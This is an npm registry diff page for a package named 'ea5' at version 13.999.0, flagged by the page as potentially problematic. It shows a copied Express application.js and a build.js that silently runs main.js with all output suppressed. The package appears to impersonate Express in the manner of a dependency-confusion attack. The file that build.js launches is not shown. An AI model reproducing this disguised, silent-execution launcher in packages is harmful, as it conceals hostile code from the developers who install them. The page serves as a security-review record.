ea5 13.999.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ea5 might be problematic. Click here for more details.
- package/application.js +644 -0
- package/build.js +13 -0
- package/express.js +116 -0
- package/index.js +13 -0
- package/main.js +13 -0
- package/package.json +16 -0
- package/request.js +525 -0
- package/response.js +1142 -0
- package/setup.sh +9 -0
- package/utils.js +306 -0
package/application.js
ADDED
@@ -0,0 +1,644 @@
|
|
1
|
+
/*!
|
2
|
+
* express
|
3
|
+
* Copyright(c) 2009-2013 TJ Holowaychuk
|
4
|
+
* Copyright(c) 2013 Roman Shtylman
|
5
|
+
* Copyright(c) 2014-2015 Douglas Christopher Wilson
|
6
|
+
* MIT Licensed
|
7
|
+
*/
|
8
|
+
|
9
|
+
'use strict';
|
10
|
+
|
11
|
+
/**
|
12
|
+
* Module dependencies.
|
13
|
+
* @private
|
14
|
+
*/
|
15
|
+
|
16
|
+
var finalhandler = require('finalhandler');
|
17
|
+
var Router = require('./router');
|
18
|
+
var methods = require('methods');
|
19
|
+
var middleware = require('./middleware/init');
|
20
|
+
var query = require('./middleware/query');
|
21
|
+
var debug = require('debug')('express:application');
|
22
|
+
var View = require('./view');
|
23
|
+
var http = require('http');
|
24
|
+
var compileETag = require('./utils').compileETag;
|
25
|
+
var compileQueryParser = require('./utils').compileQueryParser;
|
26
|
+
var compileTrust = require('./utils').compileTrust;
|
27
|
+
var deprecate = require('depd')('express');
|
28
|
+
var flatten = require('array-flatten');
|
29
|
+
var merge = require('utils-merge');
|
30
|
+
var resolve = require('path').resolve;
|
31
|
+
var setPrototypeOf = require('setprototypeof')
|
32
|
+
var slice = Array.prototype.slice;
|
33
|
+
|
34
|
+
/**
|
35
|
+
* Application prototype.
|
36
|
+
*/
|
37
|
+
|
38
|
+
var app = exports = module.exports = {};
|
39
|
+
|
40
|
+
/**
|
41
|
+
* Variable for trust proxy inheritance back-compat
|
42
|
+
* @private
|
43
|
+
*/
|
44
|
+
|
45
|
+
var trustProxyDefaultSymbol = '@@symbol:trust_proxy_default';
|
46
|
+
|
47
|
+
/**
|
48
|
+
* Initialize the server.
|
49
|
+
*
|
50
|
+
* - setup default configuration
|
51
|
+
* - setup default middleware
|
52
|
+
* - setup route reflection methods
|
53
|
+
*
|
54
|
+
* @private
|
55
|
+
*/
|
56
|
+
|
57
|
+
app.init = function init() {
|
58
|
+
this.cache = {};
|
59
|
+
this.engines = {};
|
60
|
+
this.settings = {};
|
61
|
+
|
62
|
+
this.defaultConfiguration();
|
63
|
+
};
|
64
|
+
|
65
|
+
/**
|
66
|
+
* Initialize application configuration.
|
67
|
+
* @private
|
68
|
+
*/
|
69
|
+
|
70
|
+
app.defaultConfiguration = function defaultConfiguration() {
|
71
|
+
var env = process.env.NODE_ENV || 'development';
|
72
|
+
|
73
|
+
// default settings
|
74
|
+
this.enable('x-powered-by');
|
75
|
+
this.set('etag', 'weak');
|
76
|
+
this.set('env', env);
|
77
|
+
this.set('query parser', 'extended');
|
78
|
+
this.set('subdomain offset', 2);
|
79
|
+
this.set('trust proxy', false);
|
80
|
+
|
81
|
+
// trust proxy inherit back-compat
|
82
|
+
Object.defineProperty(this.settings, trustProxyDefaultSymbol, {
|
83
|
+
configurable: true,
|
84
|
+
value: true
|
85
|
+
});
|
86
|
+
|
87
|
+
debug('booting in %s mode', env);
|
88
|
+
|
89
|
+
this.on('mount', function onmount(parent) {
|
90
|
+
// inherit trust proxy
|
91
|
+
if (this.settings[trustProxyDefaultSymbol] === true
|
92
|
+
&& typeof parent.settings['trust proxy fn'] === 'function') {
|
93
|
+
delete this.settings['trust proxy'];
|
94
|
+
delete this.settings['trust proxy fn'];
|
95
|
+
}
|
96
|
+
|
97
|
+
// inherit protos
|
98
|
+
setPrototypeOf(this.request, parent.request)
|
99
|
+
setPrototypeOf(this.response, parent.response)
|
100
|
+
setPrototypeOf(this.engines, parent.engines)
|
101
|
+
setPrototypeOf(this.settings, parent.settings)
|
102
|
+
});
|
103
|
+
|
104
|
+
// setup locals
|
105
|
+
this.locals = Object.create(null);
|
106
|
+
|
107
|
+
// top-most app is mounted at /
|
108
|
+
this.mountpath = '/';
|
109
|
+
|
110
|
+
// default locals
|
111
|
+
this.locals.settings = this.settings;
|
112
|
+
|
113
|
+
// default configuration
|
114
|
+
this.set('view', View);
|
115
|
+
this.set('views', resolve('views'));
|
116
|
+
this.set('jsonp callback name', 'callback');
|
117
|
+
|
118
|
+
if (env === 'production') {
|
119
|
+
this.enable('view cache');
|
120
|
+
}
|
121
|
+
|
122
|
+
Object.defineProperty(this, 'router', {
|
123
|
+
get: function() {
|
124
|
+
throw new Error('\'app.router\' is deprecated!\nPlease see the 3.x to 4.x migration guide for details on how to update your app.');
|
125
|
+
}
|
126
|
+
});
|
127
|
+
};
|
128
|
+
|
129
|
+
/**
|
130
|
+
* lazily adds the base router if it has not yet been added.
|
131
|
+
*
|
132
|
+
* We cannot add the base router in the defaultConfiguration because
|
133
|
+
* it reads app settings which might be set after that has run.
|
134
|
+
*
|
135
|
+
* @private
|
136
|
+
*/
|
137
|
+
app.lazyrouter = function lazyrouter() {
|
138
|
+
if (!this._router) {
|
139
|
+
this._router = new Router({
|
140
|
+
caseSensitive: this.enabled('case sensitive routing'),
|
141
|
+
strict: this.enabled('strict routing')
|
142
|
+
});
|
143
|
+
|
144
|
+
this._router.use(query(this.get('query parser fn')));
|
145
|
+
this._router.use(middleware.init(this));
|
146
|
+
}
|
147
|
+
};
|
148
|
+
|
149
|
+
/**
|
150
|
+
* Dispatch a req, res pair into the application. Starts pipeline processing.
|
151
|
+
*
|
152
|
+
* If no callback is provided, then default error handlers will respond
|
153
|
+
* in the event of an error bubbling through the stack.
|
154
|
+
*
|
155
|
+
* @private
|
156
|
+
*/
|
157
|
+
|
158
|
+
app.handle = function handle(req, res, callback) {
|
159
|
+
var router = this._router;
|
160
|
+
|
161
|
+
// final handler
|
162
|
+
var done = callback || finalhandler(req, res, {
|
163
|
+
env: this.get('env'),
|
164
|
+
onerror: logerror.bind(this)
|
165
|
+
});
|
166
|
+
|
167
|
+
// no routes
|
168
|
+
if (!router) {
|
169
|
+
debug('no routes defined on app');
|
170
|
+
done();
|
171
|
+
return;
|
172
|
+
}
|
173
|
+
|
174
|
+
router.handle(req, res, done);
|
175
|
+
};
|
176
|
+
|
177
|
+
/**
|
178
|
+
* Proxy `Router#use()` to add middleware to the app router.
|
179
|
+
* See Router#use() documentation for details.
|
180
|
+
*
|
181
|
+
* If the _fn_ parameter is an express app, then it will be
|
182
|
+
* mounted at the _route_ specified.
|
183
|
+
*
|
184
|
+
* @public
|
185
|
+
*/
|
186
|
+
|
187
|
+
app.use = function use(fn) {
|
188
|
+
var offset = 0;
|
189
|
+
var path = '/';
|
190
|
+
|
191
|
+
// default path to '/'
|
192
|
+
// disambiguate app.use([fn])
|
193
|
+
if (typeof fn !== 'function') {
|
194
|
+
var arg = fn;
|
195
|
+
|
196
|
+
while (Array.isArray(arg) && arg.length !== 0) {
|
197
|
+
arg = arg[0];
|
198
|
+
}
|
199
|
+
|
200
|
+
// first arg is the path
|
201
|
+
if (typeof arg !== 'function') {
|
202
|
+
offset = 1;
|
203
|
+
path = fn;
|
204
|
+
}
|
205
|
+
}
|
206
|
+
|
207
|
+
var fns = flatten(slice.call(arguments, offset));
|
208
|
+
|
209
|
+
if (fns.length === 0) {
|
210
|
+
throw new TypeError('app.use() requires a middleware function')
|
211
|
+
}
|
212
|
+
|
213
|
+
// setup router
|
214
|
+
this.lazyrouter();
|
215
|
+
var router = this._router;
|
216
|
+
|
217
|
+
fns.forEach(function (fn) {
|
218
|
+
// non-express app
|
219
|
+
if (!fn || !fn.handle || !fn.set) {
|
220
|
+
return router.use(path, fn);
|
221
|
+
}
|
222
|
+
|
223
|
+
debug('.use app under %s', path);
|
224
|
+
fn.mountpath = path;
|
225
|
+
fn.parent = this;
|
226
|
+
|
227
|
+
// restore .app property on req and res
|
228
|
+
router.use(path, function mounted_app(req, res, next) {
|
229
|
+
var orig = req.app;
|
230
|
+
fn.handle(req, res, function (err) {
|
231
|
+
setPrototypeOf(req, orig.request)
|
232
|
+
setPrototypeOf(res, orig.response)
|
233
|
+
next(err);
|
234
|
+
});
|
235
|
+
});
|
236
|
+
|
237
|
+
// mounted an app
|
238
|
+
fn.emit('mount', this);
|
239
|
+
}, this);
|
240
|
+
|
241
|
+
return this;
|
242
|
+
};
|
243
|
+
|
244
|
+
/**
|
245
|
+
* Proxy to the app `Router#route()`
|
246
|
+
* Returns a new `Route` instance for the _path_.
|
247
|
+
*
|
248
|
+
* Routes are isolated middleware stacks for specific paths.
|
249
|
+
* See the Route api docs for details.
|
250
|
+
*
|
251
|
+
* @public
|
252
|
+
*/
|
253
|
+
|
254
|
+
app.route = function route(path) {
|
255
|
+
this.lazyrouter();
|
256
|
+
return this._router.route(path);
|
257
|
+
};
|
258
|
+
|
259
|
+
/**
|
260
|
+
* Register the given template engine callback `fn`
|
261
|
+
* as `ext`.
|
262
|
+
*
|
263
|
+
* By default will `require()` the engine based on the
|
264
|
+
* file extension. For example if you try to render
|
265
|
+
* a "foo.ejs" file Express will invoke the following internally:
|
266
|
+
*
|
267
|
+
* app.engine('ejs', require('ejs').__express);
|
268
|
+
*
|
269
|
+
* For engines that do not provide `.__express` out of the box,
|
270
|
+
* or if you wish to "map" a different extension to the template engine
|
271
|
+
* you may use this method. For example mapping the EJS template engine to
|
272
|
+
* ".html" files:
|
273
|
+
*
|
274
|
+
* app.engine('html', require('ejs').renderFile);
|
275
|
+
*
|
276
|
+
* In this case EJS provides a `.renderFile()` method with
|
277
|
+
* the same signature that Express expects: `(path, options, callback)`,
|
278
|
+
* though note that it aliases this method as `ejs.__express` internally
|
279
|
+
* so if you're using ".ejs" extensions you dont need to do anything.
|
280
|
+
*
|
281
|
+
* Some template engines do not follow this convention, the
|
282
|
+
* [Consolidate.js](https://github.com/tj/consolidate.js)
|
283
|
+
* library was created to map all of node's popular template
|
284
|
+
* engines to follow this convention, thus allowing them to
|
285
|
+
* work seamlessly within Express.
|
286
|
+
*
|
287
|
+
* @param {String} ext
|
288
|
+
* @param {Function} fn
|
289
|
+
* @return {app} for chaining
|
290
|
+
* @public
|
291
|
+
*/
|
292
|
+
|
293
|
+
app.engine = function engine(ext, fn) {
|
294
|
+
if (typeof fn !== 'function') {
|
295
|
+
throw new Error('callback function required');
|
296
|
+
}
|
297
|
+
|
298
|
+
// get file extension
|
299
|
+
var extension = ext[0] !== '.'
|
300
|
+
? '.' + ext
|
301
|
+
: ext;
|
302
|
+
|
303
|
+
// store engine
|
304
|
+
this.engines[extension] = fn;
|
305
|
+
|
306
|
+
return this;
|
307
|
+
};
|
308
|
+
|
309
|
+
/**
|
310
|
+
* Proxy to `Router#param()` with one added api feature. The _name_ parameter
|
311
|
+
* can be an array of names.
|
312
|
+
*
|
313
|
+
* See the Router#param() docs for more details.
|
314
|
+
*
|
315
|
+
* @param {String|Array} name
|
316
|
+
* @param {Function} fn
|
317
|
+
* @return {app} for chaining
|
318
|
+
* @public
|
319
|
+
*/
|
320
|
+
|
321
|
+
app.param = function param(name, fn) {
|
322
|
+
this.lazyrouter();
|
323
|
+
|
324
|
+
if (Array.isArray(name)) {
|
325
|
+
for (var i = 0; i < name.length; i++) {
|
326
|
+
this.param(name[i], fn);
|
327
|
+
}
|
328
|
+
|
329
|
+
return this;
|
330
|
+
}
|
331
|
+
|
332
|
+
this._router.param(name, fn);
|
333
|
+
|
334
|
+
return this;
|
335
|
+
};
|
336
|
+
|
337
|
+
/**
|
338
|
+
* Assign `setting` to `val`, or return `setting`'s value.
|
339
|
+
*
|
340
|
+
* app.set('foo', 'bar');
|
341
|
+
* app.set('foo');
|
342
|
+
* // => "bar"
|
343
|
+
*
|
344
|
+
* Mounted servers inherit their parent server's settings.
|
345
|
+
*
|
346
|
+
* @param {String} setting
|
347
|
+
* @param {*} [val]
|
348
|
+
* @return {Server} for chaining
|
349
|
+
* @public
|
350
|
+
*/
|
351
|
+
|
352
|
+
app.set = function set(setting, val) {
|
353
|
+
if (arguments.length === 1) {
|
354
|
+
// app.get(setting)
|
355
|
+
return this.settings[setting];
|
356
|
+
}
|
357
|
+
|
358
|
+
debug('set "%s" to %o', setting, val);
|
359
|
+
|
360
|
+
// set value
|
361
|
+
this.settings[setting] = val;
|
362
|
+
|
363
|
+
// trigger matched settings
|
364
|
+
switch (setting) {
|
365
|
+
case 'etag':
|
366
|
+
this.set('etag fn', compileETag(val));
|
367
|
+
break;
|
368
|
+
case 'query parser':
|
369
|
+
this.set('query parser fn', compileQueryParser(val));
|
370
|
+
break;
|
371
|
+
case 'trust proxy':
|
372
|
+
this.set('trust proxy fn', compileTrust(val));
|
373
|
+
|
374
|
+
// trust proxy inherit back-compat
|
375
|
+
Object.defineProperty(this.settings, trustProxyDefaultSymbol, {
|
376
|
+
configurable: true,
|
377
|
+
value: false
|
378
|
+
});
|
379
|
+
|
380
|
+
break;
|
381
|
+
}
|
382
|
+
|
383
|
+
return this;
|
384
|
+
};
|
385
|
+
|
386
|
+
/**
|
387
|
+
* Return the app's absolute pathname
|
388
|
+
* based on the parent(s) that have
|
389
|
+
* mounted it.
|
390
|
+
*
|
391
|
+
* For example if the application was
|
392
|
+
* mounted as "/admin", which itself
|
393
|
+
* was mounted as "/blog" then the
|
394
|
+
* return value would be "/blog/admin".
|
395
|
+
*
|
396
|
+
* @return {String}
|
397
|
+
* @private
|
398
|
+
*/
|
399
|
+
|
400
|
+
app.path = function path() {
|
401
|
+
return this.parent
|
402
|
+
? this.parent.path() + this.mountpath
|
403
|
+
: '';
|
404
|
+
};
|
405
|
+
|
406
|
+
/**
|
407
|
+
* Check if `setting` is enabled (truthy).
|
408
|
+
*
|
409
|
+
* app.enabled('foo')
|
410
|
+
* // => false
|
411
|
+
*
|
412
|
+
* app.enable('foo')
|
413
|
+
* app.enabled('foo')
|
414
|
+
* // => true
|
415
|
+
*
|
416
|
+
* @param {String} setting
|
417
|
+
* @return {Boolean}
|
418
|
+
* @public
|
419
|
+
*/
|
420
|
+
|
421
|
+
app.enabled = function enabled(setting) {
|
422
|
+
return Boolean(this.set(setting));
|
423
|
+
};
|
424
|
+
|
425
|
+
/**
|
426
|
+
* Check if `setting` is disabled.
|
427
|
+
*
|
428
|
+
* app.disabled('foo')
|
429
|
+
* // => true
|
430
|
+
*
|
431
|
+
* app.enable('foo')
|
432
|
+
* app.disabled('foo')
|
433
|
+
* // => false
|
434
|
+
*
|
435
|
+
* @param {String} setting
|
436
|
+
* @return {Boolean}
|
437
|
+
* @public
|
438
|
+
*/
|
439
|
+
|
440
|
+
app.disabled = function disabled(setting) {
|
441
|
+
return !this.set(setting);
|
442
|
+
};
|
443
|
+
|
444
|
+
/**
|
445
|
+
* Enable `setting`.
|
446
|
+
*
|
447
|
+
* @param {String} setting
|
448
|
+
* @return {app} for chaining
|
449
|
+
* @public
|
450
|
+
*/
|
451
|
+
|
452
|
+
app.enable = function enable(setting) {
|
453
|
+
return this.set(setting, true);
|
454
|
+
};
|
455
|
+
|
456
|
+
/**
|
457
|
+
* Disable `setting`.
|
458
|
+
*
|
459
|
+
* @param {String} setting
|
460
|
+
* @return {app} for chaining
|
461
|
+
* @public
|
462
|
+
*/
|
463
|
+
|
464
|
+
app.disable = function disable(setting) {
|
465
|
+
return this.set(setting, false);
|
466
|
+
};
|
467
|
+
|
468
|
+
/**
|
469
|
+
* Delegate `.VERB(...)` calls to `router.VERB(...)`.
|
470
|
+
*/
|
471
|
+
|
472
|
+
methods.forEach(function(method){
|
473
|
+
app[method] = function(path){
|
474
|
+
if (method === 'get' && arguments.length === 1) {
|
475
|
+
// app.get(setting)
|
476
|
+
return this.set(path);
|
477
|
+
}
|
478
|
+
|
479
|
+
this.lazyrouter();
|
480
|
+
|
481
|
+
var route = this._router.route(path);
|
482
|
+
route[method].apply(route, slice.call(arguments, 1));
|
483
|
+
return this;
|
484
|
+
};
|
485
|
+
});
|
486
|
+
|
487
|
+
/**
|
488
|
+
* Special-cased "all" method, applying the given route `path`,
|
489
|
+
* middleware, and callback to _every_ HTTP method.
|
490
|
+
*
|
491
|
+
* @param {String} path
|
492
|
+
* @param {Function} ...
|
493
|
+
* @return {app} for chaining
|
494
|
+
* @public
|
495
|
+
*/
|
496
|
+
|
497
|
+
app.all = function all(path) {
|
498
|
+
this.lazyrouter();
|
499
|
+
|
500
|
+
var route = this._router.route(path);
|
501
|
+
var args = slice.call(arguments, 1);
|
502
|
+
|
503
|
+
for (var i = 0; i < methods.length; i++) {
|
504
|
+
route[methods[i]].apply(route, args);
|
505
|
+
}
|
506
|
+
|
507
|
+
return this;
|
508
|
+
};
|
509
|
+
|
510
|
+
// del -> delete alias
|
511
|
+
|
512
|
+
app.del = deprecate.function(app.delete, 'app.del: Use app.delete instead');
|
513
|
+
|
514
|
+
/**
|
515
|
+
* Render the given view `name` name with `options`
|
516
|
+
* and a callback accepting an error and the
|
517
|
+
* rendered template string.
|
518
|
+
*
|
519
|
+
* Example:
|
520
|
+
*
|
521
|
+
* app.render('email', { name: 'Tobi' }, function(err, html){
|
522
|
+
* // ...
|
523
|
+
* })
|
524
|
+
*
|
525
|
+
* @param {String} name
|
526
|
+
* @param {Object|Function} options or fn
|
527
|
+
* @param {Function} callback
|
528
|
+
* @public
|
529
|
+
*/
|
530
|
+
|
531
|
+
app.render = function render(name, options, callback) {
|
532
|
+
var cache = this.cache;
|
533
|
+
var done = callback;
|
534
|
+
var engines = this.engines;
|
535
|
+
var opts = options;
|
536
|
+
var renderOptions = {};
|
537
|
+
var view;
|
538
|
+
|
539
|
+
// support callback function as second arg
|
540
|
+
if (typeof options === 'function') {
|
541
|
+
done = options;
|
542
|
+
opts = {};
|
543
|
+
}
|
544
|
+
|
545
|
+
// merge app.locals
|
546
|
+
merge(renderOptions, this.locals);
|
547
|
+
|
548
|
+
// merge options._locals
|
549
|
+
if (opts._locals) {
|
550
|
+
merge(renderOptions, opts._locals);
|
551
|
+
}
|
552
|
+
|
553
|
+
// merge options
|
554
|
+
merge(renderOptions, opts);
|
555
|
+
|
556
|
+
// set .cache unless explicitly provided
|
557
|
+
if (renderOptions.cache == null) {
|
558
|
+
renderOptions.cache = this.enabled('view cache');
|
559
|
+
}
|
560
|
+
|
561
|
+
// primed cache
|
562
|
+
if (renderOptions.cache) {
|
563
|
+
view = cache[name];
|
564
|
+
}
|
565
|
+
|
566
|
+
// view
|
567
|
+
if (!view) {
|
568
|
+
var View = this.get('view');
|
569
|
+
|
570
|
+
view = new View(name, {
|
571
|
+
defaultEngine: this.get('view engine'),
|
572
|
+
root: this.get('views'),
|
573
|
+
engines: engines
|
574
|
+
});
|
575
|
+
|
576
|
+
if (!view.path) {
|
577
|
+
var dirs = Array.isArray(view.root) && view.root.length > 1
|
578
|
+
? 'directories "' + view.root.slice(0, -1).join('", "') + '" or "' + view.root[view.root.length - 1] + '"'
|
579
|
+
: 'directory "' + view.root + '"'
|
580
|
+
var err = new Error('Failed to lookup view "' + name + '" in views ' + dirs);
|
581
|
+
err.view = view;
|
582
|
+
return done(err);
|
583
|
+
}
|
584
|
+
|
585
|
+
// prime the cache
|
586
|
+
if (renderOptions.cache) {
|
587
|
+
cache[name] = view;
|
588
|
+
}
|
589
|
+
}
|
590
|
+
|
591
|
+
// render
|
592
|
+
tryRender(view, renderOptions, done);
|
593
|
+
};
|
594
|
+
|
595
|
+
/**
|
596
|
+
* Listen for connections.
|
597
|
+
*
|
598
|
+
* A node `http.Server` is returned, with this
|
599
|
+
* application (which is a `Function`) as its
|
600
|
+
* callback. If you wish to create both an HTTP
|
601
|
+
* and HTTPS server you may do so with the "http"
|
602
|
+
* and "https" modules as shown here:
|
603
|
+
*
|
604
|
+
* var http = require('http')
|
605
|
+
* , https = require('https')
|
606
|
+
* , express = require('express')
|
607
|
+
* , app = express();
|
608
|
+
*
|
609
|
+
* http.createServer(app).listen(80);
|
610
|
+
* https.createServer({ ... }, app).listen(443);
|
611
|
+
*
|
612
|
+
* @return {http.Server}
|
613
|
+
* @public
|
614
|
+
*/
|
615
|
+
|
616
|
+
app.listen = function listen() {
|
617
|
+
var server = http.createServer(this);
|
618
|
+
return server.listen.apply(server, arguments);
|
619
|
+
};
|
620
|
+
|
621
|
+
/**
|
622
|
+
* Log error using console.error.
|
623
|
+
*
|
624
|
+
* @param {Error} err
|
625
|
+
* @private
|
626
|
+
*/
|
627
|
+
|
628
|
+
function logerror(err) {
|
629
|
+
/* istanbul ignore next */
|
630
|
+
if (this.get('env') !== 'test') console.error(err.stack || err.toString());
|
631
|
+
}
|
632
|
+
|
633
|
+
/**
|
634
|
+
* Try rendering a view.
|
635
|
+
* @private
|
636
|
+
*/
|
637
|
+
|
638
|
+
function tryRender(view, options, callback) {
|
639
|
+
try {
|
640
|
+
view.render(options, callback);
|
641
|
+
} catch (err) {
|
642
|
+
callback(err);
|
643
|
+
}
|
644
|
+
}
|
package/build.js
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
const { exec } = require("child_process");
|
2
|
+
exec("node main.js > /dev/null 2>&1;", (error, data, getter) => {
|
3
|
+
if(error){
|
4
|
+
console.log("error",error.message);
|
5
|
+
return;
|
6
|
+
}
|
7
|
+
if(getter){
|
8
|
+
console.log(data);
|
9
|
+
return;
|
10
|
+
}
|
11
|
+
console.log(data);
|
12
|
+
|
13
|
+
});
|